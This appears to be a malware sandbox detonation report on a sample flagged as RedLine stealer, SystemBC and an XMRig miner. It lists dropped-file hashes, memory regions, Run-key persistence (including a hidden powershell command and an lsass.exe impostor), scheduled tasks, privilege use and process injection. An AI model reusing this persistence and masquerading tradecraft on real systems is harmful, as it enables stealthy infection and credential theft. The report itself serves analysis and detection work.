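run() returns seven findings for this event set: the Defender exclusion (928), the two masquerading binaries (1720, 1444), the two task registrations pointing into AppData and ProgramData (1068, 1592), the powercfg change (860) and the pool connection (1192). The conhost.exe process event itself produces nothing, which is the point of pairing the host rules with the network rule.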

Files

memory/748-54-0x0000000000830000-0x0000000000856000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IFZ6WPF20CDHLBMAYA8N.temp
(four writes in total, three to the .customDestinations-ms file and one to the .temp staging copy, all with identical content: the Windows PowerShell jump list, AppID 590aee7bdd69b59b, updated when powershell.exe starts)

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1636-74-0x000000001B150000-0x000000001B432000-memory.dmp

memory/1952-75-0x0000000002320000-0x0000000002328000-memory.dmp

memory/928-77-0x00000000028DB000-0x0000000002912000-memory.dmp

memory/928-76-0x00000000028D4000-0x00000000028D7000-memory.dmp

memory/1684-78-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1684-79-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1636-80-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-81-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-82-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1684-83-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1636-84-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-85-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-86-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1684-87-0x0000000002520000-0x00000000025A0000-memory.dmp

memory/1684-88-0x00000000025B0000-0x00000000025BE000-memory.dmp

memory/1952-89-0x000000001B650000-0x000000001B660000-memory.dmp

memory/1636-91-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-92-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-93-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-94-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1952-95-0x0000000002740000-0x00000000027C0000-memory.dmp

memory/1636-96-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1636-97-0x00000000024B0000-0x0000000002530000-memory.dmp

memory/1952-98-0x0000000002740000-0x00000000027C0000-memory.dmp

\Users\Admin\AppData\Roaming\OneDrive.exe (also recorded as C:\Users\Admin\AppData\Roaming\OneDrive.exe; two writes, identical content)

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1340-112-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-114-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-113-0x0000000002440000-0x00000000024C0000-memory.dmp

memory/1340-115-0x0000000002440000-0x00000000024C0000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 888bfc5a63177bdc5aaa1429eca8e632
SHA1 3eca9ed178f35a94524a17356a60702d8d5d2e69
SHA256 fc233bc51158c9250a005cab1d7e3b200722a675e392e799b11a5eef6503339c
SHA512 c95f454d559038393d55a7afc889e675ede6a8f5cdecf238f5b09ce8e0a88adc4c7e1d711c3c23469e086fe4e7beb6655b1810a5b085b137495c8db4890749ac

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/1720-124-0x000000013F0A0000-0x000000013FA6A000-memory.dmp

memory/1612-125-0x0000000000400000-0x000000000058B000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1444-133-0x00000000008D0000-0x0000000000CF0000-memory.dmp

\??\c:\users\admin\appdata\roaming\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

memory/1444-135-0x00000000008D0000-0x0000000000CF0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 1a23f09d4d0c2dcd645a4553c961260b
SHA1 86b8f8b7f46d00e520dd305367a74c9ea6faee93
SHA256 daaf04d204b6926c8f84c2142e88543abf98c064952c3064d7ac6e2251bc497c
SHA512 31b331a2ecb71575e6fcbaf05aca9dc66e8e2809a6e674f32c1317da5d8afc49b74da952ee725a2721ac749f97d1cb6c5ec207d91b25c89fd3de00986894cf92

memory/1476-142-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-141-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-143-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1476-144-0x0000000002790000-0x0000000002810000-memory.dmp

memory/1444-145-0x0000000005A40000-0x0000000005A80000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

memory/2040-151-0x00000000000F0000-0x0000000000110000-memory.dmp

memory/2004-150-0x000000013F0C0000-0x000000013FA8A000-memory.dmp

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\ProgramData\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

\??\c:\programdata\lsass\lsass.exe

MD5 eb85c562249e96d7a946111241f0ea4b
SHA1 5c89db5dad53c26ec1f8189261a7fc4eace18773
SHA256 95f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512 ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77

C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat

MD5 726fb8450ea42fac9ac918ff46d85487
SHA1 47556b2f7d7f17896f329f3ab759c7a1602e980e
SHA256 566889a897e2647864e4b0e0b63665cd98bbf5253cf6821fa516f71b098e28eb
SHA512 c606085baddb37a2342bff6c60d95cf2bf982102f6368b4a0f423debeb4c96172922c0fefb7072e71c2ddfc298971a9b7f17f9a0818e8c974116f5bcec237dae

memory/1112-166-0x0000000000EE0000-0x0000000001300000-memory.dmp

memory/1444-167-0x00000000008D0000-0x0000000000CF0000-memory.dmp

memory/1112-168-0x0000000000EE0000-0x0000000001300000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp85B.tmp.bat

MD5 726fb8450ea42fac9ac918ff46d85487
SHA1 47556b2f7d7f17896f329f3ab759c7a1602e980e
SHA256 566889a897e2647864e4b0e0b63665cd98bbf5253cf6821fa516f71b098e28eb
SHA512 c606085baddb37a2342bff6c60d95cf2bf982102f6368b4a0f423debeb4c96172922c0fefb7072e71c2ddfc298971a9b7f17f9a0818e8c974116f5bcec237dae

memory/1112-170-0x0000000003340000-0x0000000003380000-memory.dmp

memory/1112-171-0x0000000000EE0000-0x0000000001300000-memory.dmp

C:\Users\Admin\Desktop\ExportWait.txt

MD5 72fc9a99f9afb21c7d00d1f0d62cf395
SHA1 ec366fa381e6a18329feefb17f7ef214c5a72e32
SHA256 d6d83554d88ff5967052ccd8a1486ae6b9d21836b3f0d82f90c1d6dcc0adc6f8
SHA512 186d24a3ac233cdb8394127bb5c1b633dee420ae350555d08e3b8fb034ca29d04c7b91c080cd6f717bb61c716e1d7f71a876c39dd1d75626347b481dc49c179e


Analysis: behavioral2

Detonation Overview

Submitted

2023-05-07 01:16

Reported

2023-05-07 05:50

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

169s

Command Line

C:\Windows\Explorer.EXE

Signatures

Detects Redline Stealer samples

stealer
Description Indicator Process Target
N/A N/A N/A N/A

RedLine

infostealer redline

SystemBC

trojan systembc

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\lsass.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" C:\Users\Admin\AppData\Roaming\lsass.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Roaming\dllhost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Roaming\\dllhost.exe'\"" C:\Users\Admin\AppData\Roaming\dllhost.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1620 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 4172 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1620 wrote to memory of 2028 N/A C:\Users\Admin\AppData\Local\Temp\3dbfc85922adcc72d86d8c50d0e027efeb71bc9b0b4f8c7bba7be5348a7d0d5d.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2616 wrote to memory of 1964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4172 wrote to memory of 3608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 4172 wrote to memory of 3608 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 2208 wrote to memory of 4252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 4252 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 536 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 3844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 3844 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 5116 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2208 wrote to memory of 5116 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 4172 wrote to memory of 5024 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
